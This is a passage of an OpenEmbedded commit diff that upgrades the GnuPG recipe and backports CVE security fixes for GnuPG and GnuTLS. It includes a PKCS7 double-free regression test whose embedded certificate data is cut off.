+Subject: [PATCH] dirmngr uses libgpg error
 
 Upstream-Status: Pending
 Signed-off-by: Saul Wold <sgw@linux.intel.com>
@@ -9,24 +9,20 @@ Signed-off-by: Saul Wold <sgw@linux.intel.com>
 Rebase to 2.1.23
 
 Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
+
 ---
- dirmngr/Makefile.am | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
+ dirmngr/Makefile.am | 1 +
+ 1 file changed, 1 insertion(+)
 
 diff --git a/dirmngr/Makefile.am b/dirmngr/Makefile.am
-index b404165..d3f916e 100644
+index 00d3c42..450d873 100644
 --- a/dirmngr/Makefile.am
 +++ b/dirmngr/Makefile.am
-@@ -82,7 +82,8 @@ endif
- dirmngr_LDADD = $(libcommonpth) \
+@@ -101,6 +101,7 @@ dirmngr_LDADD = $(libcommonpth) \
          $(DNSLIBS) $(LIBASSUAN_LIBS) \
  	$(LIBGCRYPT_LIBS) $(KSBA_LIBS) $(NPTH_LIBS) \
--	$(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV)
-+	$(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) \
-+	$(GPG_ERROR_LIBS)
+ 	$(NTBTLS_LIBS) $(LIBGNUTLS_LIBS) $(LIBINTL) $(LIBICONV) $(NETLIBS) \
++	$(GPG_ERROR_LIBS) \
+         $(dirmngr_robj)
  if USE_LDAP
  dirmngr_LDADD += $(ldaplibs)
- endif
--- 
-1.8.3.1
-
diff --git a/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch b/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch
new file mode 100644
index 0000000000..5992949d35
--- /dev/null
+++ b/meta/recipes-support/gnupg/gnupg/CVE-2022-34903.patch
@@ -0,0 +1,44 @@
+From 2f05fc96b1332caf97176841b1152da3f0aa16a8 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 22 Jul 2022 17:52:36 +0530
+Subject: [PATCH] CVE-2022-34903
+
+Upstream-Status: Backport [https://git.gnupg.org/cgi-bin/gitweb.cgi?p=gnupg.git;a=commit;h=34c649b3601383cd11dbc76221747ec16fd68e1b]
+CVE: CVE-2022-34903
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ g10/cpr.c | 13 ++++---------
+ 1 file changed, 4 insertions(+), 9 deletions(-)
+
+diff --git a/g10/cpr.c b/g10/cpr.c
+index d502e8b..bc4b715 100644
+--- a/g10/cpr.c
++++ b/g10/cpr.c
+@@ -328,20 +328,15 @@ write_status_text_and_buffer (int no, const char *string,
+             }
+           first = 0;
+         }
+-      for (esc=0, s=buffer, n=len; n && !esc; s++, n--)
++      for (esc=0, s=buffer, n=len; n; s++, n--)
+         {
+           if (*s == '%' || *(const byte*)s <= lower_limit
+               || *(const byte*)s == 127 )
+             esc = 1;
+           if (wrap && ++count > wrap)
+-            {
+-              dowrap=1;
+-              break;
+-            }
+-        }
+-      if (esc)
+-        {
+-          s--; n++;
++            dowrap=1;
++          if (esc || dowrap)
++            break;
+         }
+       if (s != buffer)
+         es_fwrite (buffer, s-buffer, 1, statusfp);
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/gnupg/gnupg/relocate.patch b/meta/recipes-support/gnupg/gnupg/relocate.patch
index e5a82aa76d..7f7812cd46 100644
--- a/meta/recipes-support/gnupg/gnupg/relocate.patch
+++ b/meta/recipes-support/gnupg/gnupg/relocate.patch
@@ -1,4 +1,4 @@
-From 59c077f32e81190955910cae02599c7a3edfa7fb Mon Sep 17 00:00:00 2001
+From bd66af2ac7bb6d9294ac8055a55462ba7c4f9c9b Mon Sep 17 00:00:00 2001
 From: Ross Burton <ross.burton@intel.com>
 Date: Wed, 19 Sep 2018 14:44:40 +0100
 Subject: [PATCH] Allow the environment to override where gnupg looks for its
@@ -12,10 +12,10 @@ Signed-off-by: Ross Burton <ross.burton@intel.com>
  1 file changed, 8 insertions(+), 8 deletions(-)
 
 diff --git a/common/homedir.c b/common/homedir.c
-index e9e75d0..19140aa 100644
+index 4b6e46e..58989b4 100644
 --- a/common/homedir.c
 +++ b/common/homedir.c
-@@ -760,7 +760,7 @@ gnupg_socketdir (void)
+@@ -763,7 +763,7 @@ gnupg_socketdir (void)
    if (!name)
      {
        unsigned int dummy;
@@ -24,7 +24,7 @@ index e9e75d0..19140aa 100644
      }
  
    return name;
-@@ -786,7 +786,7 @@ gnupg_sysconfdir (void)
+@@ -789,7 +789,7 @@ gnupg_sysconfdir (void)
      }
    return name;
  #else /*!HAVE_W32_SYSTEM*/
@@ -33,7 +33,7 @@ index e9e75d0..19140aa 100644
  #endif /*!HAVE_W32_SYSTEM*/
  }
  
-@@ -815,7 +815,7 @@ gnupg_bindir (void)
+@@ -818,7 +818,7 @@ gnupg_bindir (void)
    else
      return rdir;
  #else /*!HAVE_W32_SYSTEM*/
@@ -42,7 +42,7 @@ index e9e75d0..19140aa 100644
  #endif /*!HAVE_W32_SYSTEM*/
  }
  
-@@ -828,7 +828,7 @@ gnupg_libexecdir (void)
+@@ -831,7 +831,7 @@ gnupg_libexecdir (void)
  #ifdef HAVE_W32_SYSTEM
    return gnupg_bindir ();
  #else /*!HAVE_W32_SYSTEM*/
@@ -51,7 +51,7 @@ index e9e75d0..19140aa 100644
  #endif /*!HAVE_W32_SYSTEM*/
  }
  
-@@ -842,7 +842,7 @@ gnupg_libdir (void)
+@@ -845,7 +845,7 @@ gnupg_libdir (void)
      name = xstrconcat (w32_rootdir (), DIRSEP_S "lib" DIRSEP_S "gnupg", NULL);
    return name;
  #else /*!HAVE_W32_SYSTEM*/
@@ -60,7 +60,7 @@ index e9e75d0..19140aa 100644
  #endif /*!HAVE_W32_SYSTEM*/
  }
  
-@@ -856,7 +856,7 @@ gnupg_datadir (void)
+@@ -859,7 +859,7 @@ gnupg_datadir (void)
      name = xstrconcat (w32_rootdir (), DIRSEP_S "share" DIRSEP_S "gnupg", NULL);
    return name;
  #else /*!HAVE_W32_SYSTEM*/
@@ -69,7 +69,7 @@ index e9e75d0..19140aa 100644
  #endif /*!HAVE_W32_SYSTEM*/
  }
  
-@@ -872,7 +872,7 @@ gnupg_localedir (void)
+@@ -875,7 +875,7 @@ gnupg_localedir (void)
                         NULL);
    return name;
  #else /*!HAVE_W32_SYSTEM*/
@@ -78,7 +78,7 @@ index e9e75d0..19140aa 100644
  #endif /*!HAVE_W32_SYSTEM*/
  }
  
-@@ -940,7 +940,7 @@ gnupg_cachedir (void)
+@@ -943,7 +943,7 @@ gnupg_cachedir (void)
      }
    return dir;
  #else /*!HAVE_W32_SYSTEM*/
diff --git a/meta/recipes-support/gnupg/gnupg_2.2.20.bb b/meta/recipes-support/gnupg/gnupg_2.2.27.bb
index f754573c88..bd09b02017 100644
--- a/meta/recipes-support/gnupg/gnupg_2.2.20.bb
+++ b/meta/recipes-support/gnupg/gnupg_2.2.27.bb
@@ -1,4 +1,9 @@
 SUMMARY = "GNU Privacy Guard - encryption and signing tools (2.x)"
+DESCRIPTION = "A complete and free implementation of the OpenPGP standard \
+as defined by RFC4880 (also known as PGP). GnuPG allows you to encrypt \
+and sign your data and communications; it features a versatile key \
+management system, along with access modules for all kinds of public \
+key directories."
 HOMEPAGE = "http://www.gnupg.org/"
 LICENSE = "GPLv3 & LGPLv3"
 LIC_FILES_CHKSUM = "file://COPYING;md5=189af8afca6d6075ba6c9e0aa8077626 \
@@ -15,19 +20,20 @@ SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
            file://0003-dirmngr-uses-libgpg-error.patch \
            file://0004-autogen.sh-fix-find-version-for-beta-checking.patch \
            file://0001-Woverride-init-is-not-needed-with-gcc-9.patch \
+           file://CVE-2022-34903.patch \
            "
 SRC_URI_append_class-native = " file://0001-configure.ac-use-a-custom-value-for-the-location-of-.patch \
                                 file://relocate.patch"
 SRC_URI_append_class-nativesdk = " file://relocate.patch"
 
-SRC_URI[md5sum] = "4ff88920cf52b35db0dedaee87bdbbb1"
-SRC_URI[sha256sum] = "04a7c9d48b74c399168ee8270e548588ddbe52218c337703d7f06373d326ca30"
+SRC_URI[sha256sum] = "34e60009014ea16402069136e0a5f63d9b65f90096244975db5cea74b3d02399"
 
 EXTRA_OECONF = "--disable-ldap \
 		--disable-ccid-driver \
 		--with-zlib=${STAGING_LIBDIR}/.. \
 		--with-bzip2=${STAGING_LIBDIR}/.. \
 		--with-readline=${STAGING_LIBDIR}/.. \
+		--with-mailprog=${sbindir}/sendmail \
 		--enable-gpg-is-gpg2 \
                "
 
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch
new file mode 100644
index 0000000000..6fe7a21e33
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-20231.patch
@@ -0,0 +1,67 @@
+From 15beb4b193b2714d88107e7dffca781798684e7e Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Fri, 29 Jan 2021 14:06:32 +0100
+Subject: [PATCH] key_share: avoid use-after-free around realloc
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/15beb4b193b2714d88107e7dffca781798684e7e
+Upstream-Status: Backport 
+CVE: CVE-2021-CVE-2021-20231
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ext/key_share.c | 12 +++++-------
+ 1 file changed, 5 insertions(+), 7 deletions(-)
+
+diff --git a/lib/ext/key_share.c b/lib/ext/key_share.c
+index ab8abf8fe6..a8c4bb5cff 100644
+--- a/lib/ext/key_share.c
++++ b/lib/ext/key_share.c
+@@ -664,14 +664,14 @@ key_share_send_params(gnutls_session_t session,
+ {
+ 	unsigned i;
+ 	int ret;
+-	unsigned char *lengthp;
+-	unsigned int cur_length;
+ 	unsigned int generated = 0;
+ 	const gnutls_group_entry_st *group;
+ 	const version_entry_st *ver;
+ 
+ 	/* this extension is only being sent on client side */
+ 	if (session->security_parameters.entity == GNUTLS_CLIENT) {
++		unsigned int length_pos;
++
+ 		ver = _gnutls_version_max(session);
+ 		if (unlikely(ver == NULL || ver->key_shares == 0))
+ 			return 0;
+@@ -679,16 +679,13 @@ key_share_send_params(gnutls_session_t session,
+ 		if (!have_creds_for_tls13(session))
+ 			return 0;
+ 
+-		/* write the total length later */
+-		lengthp = &extdata->data[extdata->length];
++		length_pos = extdata->length;
+ 
+ 		ret =
+ 		    _gnutls_buffer_append_prefix(extdata, 16, 0);
+ 		if (ret < 0)
+ 			return gnutls_assert_val(ret);
+ 
+-		cur_length = extdata->length;
+-
+ 		if (session->internals.hsk_flags & HSK_HRR_RECEIVED) { /* we know the group */
+ 			group = get_group(session);
+ 			if (unlikely(group == NULL))
+@@ -736,7 +733,8 @@ key_share_send_params(gnutls_session_t session,
+ 		}
+ 
+ 		/* copy actual length */
+-		_gnutls_write_uint16(extdata->length - cur_length, lengthp);
++		_gnutls_write_uint16(extdata->length - length_pos - 2,
++				     &extdata->data[length_pos]);
+ 
+ 	} else { /* server */
+ 		ver = get_version(session);
+-- 
+GitLab
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch
new file mode 100644
index 0000000000..e13917cddb
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-20232.patch
@@ -0,0 +1,65 @@
+From 75a937d97f4fefc6f9b08e3791f151445f551cb3 Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Fri, 29 Jan 2021 14:06:50 +0100
+Subject: [PATCH] pre_shared_key: avoid use-after-free around realloc
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/75a937d97f4fefc6f9b08e3791f151445f551cb3
+Upstream-Status: Backport 
+CVE: CVE-2021-CVE-2021-20232
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/ext/pre_shared_key.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/lib/ext/pre_shared_key.c b/lib/ext/pre_shared_key.c
+index a042c6488e..380bf39ed5 100644
+--- a/lib/ext/pre_shared_key.c
++++ b/lib/ext/pre_shared_key.c
+@@ -267,7 +267,7 @@ client_send_params(gnutls_session_t session,
+ 	size_t spos;
+ 	gnutls_datum_t username = {NULL, 0};
+ 	gnutls_datum_t user_key = {NULL, 0}, rkey = {NULL, 0};
+-	gnutls_datum_t client_hello;
++	unsigned client_hello_len;
+ 	unsigned next_idx;
+ 	const mac_entry_st *prf_res = NULL;
+ 	const mac_entry_st *prf_psk = NULL;
+@@ -428,8 +428,7 @@ client_send_params(gnutls_session_t session,
+ 	assert(extdata->length >= sizeof(mbuffer_st));
+ 	assert(ext_offset >= (ssize_t)sizeof(mbuffer_st));
+ 	ext_offset -= sizeof(mbuffer_st);
+-	client_hello.data = extdata->data+sizeof(mbuffer_st);
+-	client_hello.size = extdata->length-sizeof(mbuffer_st);
++	client_hello_len = extdata->length-sizeof(mbuffer_st);
+ 
+ 	next_idx = 0;
+ 
+@@ -440,6 +439,11 @@ client_send_params(gnutls_session_t session,
+ 	}
+ 
+ 	if (prf_res && rkey.size > 0) {
++		gnutls_datum_t client_hello;
++
++		client_hello.data = extdata->data+sizeof(mbuffer_st);
++		client_hello.size = client_hello_len;
++
+ 		ret = compute_psk_binder(session, prf_res,
+ 					 binders_len, binders_pos,
+ 					 ext_offset, &rkey, &client_hello, 1,
+@@ -474,6 +478,11 @@ client_send_params(gnutls_session_t session,
+ 	}
+ 
+ 	if (prf_psk && user_key.size > 0 && info) {
++		gnutls_datum_t client_hello;
++
++		client_hello.data = extdata->data+sizeof(mbuffer_st);
++		client_hello.size = client_hello_len;
++
+ 		ret = compute_psk_binder(session, prf_psk,
+ 					 binders_len, binders_pos,
+ 					 ext_offset, &user_key, &client_hello, 0,
+-- 
+GitLab
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch b/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch
new file mode 100644
index 0000000000..0bcb55e573
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2021-4209.patch
@@ -0,0 +1,37 @@
+From 3db352734472d851318944db13be73da61300568 Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Wed, 22 Dec 2021 09:12:25 +0100
+Subject: [PATCH] wrap_nettle_hash_fast: avoid calling _update with zero-length
+ input
+
+As Nettle's hash update functions internally call memcpy, providing
+zero-length input may cause undefined behavior.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568
+Upstream-Status: Backport
+CVE: CVE-2021-4209
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ lib/nettle/mac.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/lib/nettle/mac.c b/lib/nettle/mac.c
+index f9d4d7a8df..35e070fab0 100644
+--- a/lib/nettle/mac.c
++++ b/lib/nettle/mac.c
+@@ -788,7 +788,9 @@ static int wrap_nettle_hash_fast(gnutls_digest_algorithm_t algo,
+ 	if (ret < 0)
+ 		return gnutls_assert_val(ret);
+ 
+-	ctx.update(&ctx, text_size, text);
++	if (text_size > 0) {
++		ctx.update(&ctx, text_size, text);
++	}
+ 	ctx.digest(&ctx, ctx.length, digest);
+ 
+ 	return 0;
+-- 
+GitLab
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch b/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch
new file mode 100644
index 0000000000..f8954945d0
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2022-2509.patch
@@ -0,0 +1,282 @@
+From 9835638d4e1f37781a47e777c76d5bb14218929b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 16 Aug 2022 12:23:14 +0530
+Subject: [PATCH] CVE-2022-2509
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/ce37f9eb265dbe9b6d597f5767449e8ee95848e2]
+CVE: CVE-2022-2509
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ NEWS                             |   4 +
+ lib/x509/pkcs7.c                 |   3 +-
+ tests/Makefile.am                |   2 +-
+ tests/pkcs7-verify-double-free.c | 215 +++++++++++++++++++++++++++++++
+ 4 files changed, 222 insertions(+), 2 deletions(-)
+ create mode 100644 tests/pkcs7-verify-double-free.c
+
+diff --git a/NEWS b/NEWS
+index 755a67c..ba70bb3 100644
+--- a/NEWS
++++ b/NEWS
+@@ -7,6 +7,10 @@ See the end for copying conditions.
+ 
+ * Version 3.6.14 (released 2020-06-03)
+ 
++** libgnutls: Fixed double free during verification of pkcs7 signatures.
++   Reported by Jaak Ristioja (#1383). [GNUTLS-SA-2022-07-07, CVSS: medium]
++   [CVE-2022-2509]
++
+ ** libgnutls: Fixed insecure session ticket key construction, since 3.6.4.
+    The TLS server would not bind the session ticket encryption key with a
+    value supplied by the application until the initial key rotation, allowing
+diff --git a/lib/x509/pkcs7.c b/lib/x509/pkcs7.c
+index 98669e8..ccbc69d 100644
+--- a/lib/x509/pkcs7.c
++++ b/lib/x509/pkcs7.c
+@@ -1318,7 +1318,8 @@ gnutls_x509_crt_t find_signer(gnutls_pkcs7_t pkcs7, gnutls_x509_trust_list_t tl,
+ 				issuer = find_verified_issuer_of(pkcs7, issuer, purpose, vflags);
+ 
+ 				if (issuer != NULL && gnutls_x509_crt_check_issuer(issuer, issuer)) {
+-					if (prev) gnutls_x509_crt_deinit(prev);
++					if (prev && prev != signer)
++						gnutls_x509_crt_deinit(prev);
+ 					prev = issuer;
+ 					break;
+ 				}
+diff --git a/tests/Makefile.am b/tests/Makefile.am
+index 11a083c..cd43a0f 100644
+--- a/tests/Makefile.am
++++ b/tests/Makefile.am
+@@ -219,7 +219,7 @@ ctests += mini-record-2 simple gnutls_hmac_fast set_pkcs12_cred cert certuniquei
+ 	 tls-record-size-limit-asym dh-compute ecdh-compute sign-verify-data-newapi \
+ 	 sign-verify-newapi sign-verify-deterministic iov aead-cipher-vec \
+ 	 tls13-without-timeout-func buffer status-request-revoked \
+-	 set_x509_ocsp_multi_cli kdf-api keylog-func \
++	 set_x509_ocsp_multi_cli kdf-api keylog-func pkcs7-verify-double-free \
+ 	 dtls_hello_random_value tls_hello_random_value x509cert-dntypes
+ 
+ if HAVE_SECCOMP_TESTS
+diff --git a/tests/pkcs7-verify-double-free.c b/tests/pkcs7-verify-double-free.c
+new file mode 100644
+index 0000000..fadf307
+--- /dev/null
++++ b/tests/pkcs7-verify-double-free.c
+@@ -0,0 +1,215 @@
++/*
++ * Copyright (C) 2022 Red Hat, Inc.
++ *
++ * Author: Zoltan Fridrich
++ *
++ * This file is part of GnuTLS.
++ *
++ * GnuTLS is free software: you can redistribute it and/or modify it
++ * under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GnuTLS is distributed in the hope that it will be useful, but
++ * WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ * General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GnuTLS. If not, see <https://www.gnu.org/licenses/>.
++ */
++
++#ifdef HAVE_CONFIG_H
++#include <config.h>
++#endif
++
++#include <stdio.h>
++#include <gnutls/pkcs7.h>
++#include <gnutls/x509.h>
++
++#include "utils.h"
++
++static char rca_pem[] =
++	"-----BEGIN CERTIFICATE-----\n"
++	"MIIDCjCCAfKgAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQKDApFeGFt\n"
++	"cGxlIENBMCAXDTE3MDcyMTE0NDMzNloYDzIyMjIwNzIxMTQ0MzM2WjAVMRMwEQYD\n"
++	"VQQKDApFeGFtcGxlIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA\n"
++	"v8hnKPJ/IA0SQB/A/a0Uh+npZ67vsgIMrtTQo0r0kJkmkBz5323xO3DVuJfB3QmX\n"
++	"v9zvoeCQLuDvWar5Aixfxgm6s5Q+yPvJj9t3NebDrU+Y4+qyewBIJUF8EF/5iBPC\n"
++	"ZHONmzbfIRWvQWGGgb2CRcOHp2J7AY/QLB6LsWPaLjs/DHva28Q13JaTTHIpdu8v\n"
++	"t6vHr0nXf66DN4MvtoF3N+o+v3snJCMsfXOqASi4tbWR7gtOfCfiz9uBjh0W2Dut\n"
++	"/jclBQkJkLe6esNSM+f4YiOpctVDjmfj8yoHCp394vt0wFqhG38wsTFAyVP6qIcf\n"
++	"5zoSu9ovEt2cTkhnZHjiiwIDAQABo2MwYTAPBgNVHRMBAf8EBTADAQH/MA4GA1Ud\n"
++	"DwEB/wQEAwIBBjAdBgNVHQ4EFgQUhjeO6Uc5imbjOl2I2ltVA27Hu9YwHwYDVR0j\n"
++	"BBgwFoAUhjeO6Uc5imbjOl2I2ltVA27Hu9YwDQYJKoZIhvcNAQELBQADggEBAD+r\n"
++	"i/7FsbG0OFKGF2+JOnth6NjJQcMfM8LiglqAuBUijrv7vltoZ0Z3FJH1Vi4OeMXn\n"
++	"l7X/9tWUve0uFl75MfjDrf0+lCEdYRY1LCba2BrUgpbbkLywVUdnbsvndehegCgS\n"
++	"jss2/zys3Hlo3ZaHlTMQ/NQ4nrxcxkjOvkZSEOqgxJTLpzm6pr7YUts4k6c6lNiB\n"
++	"FSiJiDzsJCmWR9C3fBbUlfDfTJYGN3JwqX270KchXDElo8gNoDnF7jBMpLFFSEKm\n"
++	"MyfbNLX/srh+CEfZaN/OZV4A3MQ0L8vQEp6M4CJhvRLIuMVabZ2coJ0AzystrOMU\n"
++	"LirBWjg89RoAjFQ7bTE=\n"
++	"-----END CERTIFICATE-----\n";
++
++static char ca_pem[] =
++	"-----BEGIN CERTIFICATE-----\n"
++	"MIIDFzCCAf+gAwIBAgIBAjANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQKDApFeGFt\n"
++	"cGxlIENBMCAXDTE3MDcyMTE0NDQzNFoYDzIyMjIwNzIxMTQ0NDM0WjAiMSAwHgYD\n"
++	"VQQKDBdFeGFtcGxlIGludGVybWVkaWF0ZSBDQTCCASIwDQYJKoZIhvcNAQEBBQAD\n"
++	"ggEPADCCAQoCggEBAKb9ACB8u//sP6MfNU1OsVw68xz3eTPLgKxS0vpqexm6iGVg\n"
++	"ug/o9uYRLzqiEukv/eyz9WzHmY7sqlOJjOFdv92+SaNg79Jc51WHPFXgea4/qyfr\n"
++	"4y14PGs0SNxm6T44sXurUs7cXydQVUgnq2VCaWFOTUdxXoAWkV8r8GaUoPD/klVz\n"
++	"RqxSZVETmX1XBKhsMnnov41kRwVph2C+VfUspsbaUZaz/o/S1/nokhXRACzKsMBr\n"
++	"obqiGxbY35uVzsmbAW5ErhQz98AWJL3Bub1fsEMXg6OEMmPH4AtX888dTIYZNw0E\n"
++	"bUIESspz1kjJQTtVQDHTprhwz16YiSVeUonlLgMCAwEAAaNjMGEwDwYDVR0TAQH/\n"
++	"BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFPBjxDWjMhjXERirKF9O\n"
++	"o/5Cllc5MB8GA1UdIwQYMBaAFIY3julHOYpm4zpdiNpbVQNux7vWMA0GCSqGSIb3\n"
++	"DQEBCwUAA4IBAQCTm+vv3hBa6lL5IT+Fw8aTxQ2Ne7mZ5oyazhvXYwwfKNMX3SML\n"
++	"W2JdPaL64ZwbxxxYvW401o5Z0CEgru3YFrsqB/hEdl0Uf8UWWJmE1rRa+miTmbjt\n"
++	"lrLNCWdrs6CiwvsPITTHg7jevB4KyZYsTSxQFcyr3N3xF+6EmOTC4IkhPPnXYXcp\n"
++	"248ih+WOavSYoRvzgB/Dip1WnPYU2mfIV3O8JReRryngA0TzWCLPLUoWR3R4jwtC\n"
++	"+1uSLoqaenz3qv3F1WEbke37az9YJuXx/5D8CqFQiZ62TUUtI6fYd8mkMBM4Qfh6\n"
++	"NW9XrCkI9wlpL5K9HllhuW0BhKeJkuPpyQ2p\n"
++	"-----END CERTIFICATE-----\n";
++
++static char ee_pem[] =
++	"-----BEGIN CERTIFICATE-----\n"
++	"MIIDIjCCAgqgAwIBAgIBATANBgkqhkiG9w0BAQsFADAiMSAwHgYDVQQKDBdFeGFt\n"
++	"cGxlIGludGVybWVkaWF0ZSBDQTAgFw0yMjA3MjExNDQ1MzdaGA8yMjIyMDcyMTE0\n"
++	"NDUzN1owFTETMBEGA1UEAwwKSm9obiBTbWl0aDCCASIwDQYJKoZIhvcNAQEBBQAD\n"
++	"ggEPADCCAQoCggEBAMb1uuxppBFY+WVD45iyHUq7DkIJNNOI/JRaybVJfPktWq2E\n"
++	"eNe7XhV05KKnqZTbDO2iYqNHqGhZ8pz/IstDRTZP3z/q1vXTG0P9Gx28rEy5TaUY\n"
++	"QjtD+ZoFUQm0ORMDBjd8jikqtJ87hKeuOPMH4rzdydotMaPQSm7KLzHBGBr6gg7z\n"
++	"g1IxPWkhMyHapoMqqrhjwjzoTY97UIXpZTEoIA+KpEC8f9CciBtL0i1MPBjWozB6\n"
++	"Jma9q5iEwZXuRr3cnPYeIPlK2drgDZCMuSFcYiT8ApLw5OhKqY1m2EvfZ2ox2s9R\n"
++	"68/HzYdPi3kZwiNEtlBvMlpt5yKBJAflp76d7DkCAwEAAaNuMGwwCwYDVR0PBAQD\n"
++	"AgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDBDAdBgNVHQ4EFgQUc+Mi\n"
++	"kr8WMCk00SQo+P2iggp/oQkwHwYDVR0jBBgwFoAU8GPENaMyGNcRGKsoX06j/kKW\n"
++	"VzkwDQYJKoZIhvcNAQELBQADggEBAKU9+CUR0Jcfybd1+8Aqgh1RH96yQygnVuyt\n"
++	"Na9rFz4fM3ij9tGXDHXrkZw8bW1dWLU9quu8zeTxKxc3aiDIw739Alz0tukttDo7\n"
++	"dW7YqIb77zsIsWB9p7G9dlxT6ieUy+5IKk69BbeK8KR0vAciAG4KVQxPhuPy/LGX\n"
++	"PzqlJIJ4h61s3UOroReHPB1keLZgpORqrvtpClOmABH9TLFRJA/WFg8Q2XYB/p0x\n"
++	"l/pWiaoBC+8wK9cDoMUK5yOwXeuCLffCb+UlAD0+z/qxJ2pisE8E9X8rRKRrWI+i\n"
++	"G7LtJCEn86EQK8KuRlJxKgj8lClZhoULB0oL4jbblBuNow9WRmM=\n"
++	"-----END CERTIFICATE-----\n";
++
++static char msg_pem[] =
++	"-----BEGIN PKCS7-----\n"
++	"MIIK2QYJKoZIhvcNAQcCoIIKyjCCCsYCAQExDTALBglghkgBZQMEAgEwCwYJKoZI\n"
++	"hvcNAQcBoIIJTzCCAwowggHyoAMCAQICAQEwDQYJKoZIhvcNAQELBQAwFTETMBEG\n"
++	"A1UECgwKRXhhbXBsZSBDQTAgFw0xNzA3MjExNDQzMjFaGA8yMjIyMDcyMTE0NDMy\n"
++	"MVowFTETMBEGA1UECgwKRXhhbXBsZSBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEP\n"
++	"ADCCAQoCggEBAL51eyE4j8wAKQKMGlO9HEY2iaGvsdPSJmidSdmCi1jnNK39Lx4Y\n"
++	"31h279hSHF5wtI6VM91HHfeLf1mjEZHlKrXXJQzBPLpbHWapD778drHBitOP8e56\n"
++	"fDMIfofLV4tkMk8690vPe4cJH1UHGspMyz6EQF9kPRaW80XtMV/6dalgL/9Esmaw\n"
++	"XBNPJAS1VutDuXQkJ/3/rWFLmkpYHHtGPjX782YRmT1s+VOVTsLqmKx0TEL8A381\n"
++	"bbElHPUAMjPcyWR5qqA8KWnS5Dwqk3LwI0AvuhQytCq0S7Xl4DXauvxwTRXv0UU7\n"
++	"W8r3MLAw9DnlnJiD/RFjw5rbGO3wMePk/qUCAwEAAaNjMGEwDwYDVR0TAQH/BAUw\n"
++	"AwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFIh2KRoKJoe2VtpOwWMkRAkR\n"
++	"mLWKMB8GA1UdIwQYMBaAFIh2KRoKJoe2VtpOwWMkRAkRmLWKMA0GCSqGSIb3DQEB\n"
++	"CwUAA4IBAQBovvlOjoy0MCT5U0eWfcPQQjY4Ssrn3IiPNlVkqSNo+FHX+2baTLVQ\n"
++	"5QTHxwXwzdIJiwtjFWDdGEQXqmuIvnFG+u/whGbeg6oQygfnQ5Y+q6epOxCsPgLQ\n"
++	"mKKEaF7mvh8DauUx4QSbYCNGCctOZuB1vlN9bJ3/5QbH+2pFPOfCr5CAyPDwHo6S\n"
++	"qO3yPcutRwT9xS7gXEHM9HhLp+DmdCGh4eVBPiFilyZm1d92lWxU8oxoSfXgzDT/\n"
++	"GCzlMykNZNs4JD9QmiRClP/3U0dQbOhah/Fda+N+L90xaqEgGcvwKKZa3pzo59pl\n"
++	"BbkcIP4YPyHeinwkgAn5UVJg9DOxNCS0MIIDFzCCAf+gAwIBAgIBAjANBgkqhkiG\n"
++	"9w0BAQsFADAVMRMwEQYDVQQKDApFeGFtcGxlIENBMCAXDTE3MDcyMTE0NDQxM1oY\n"
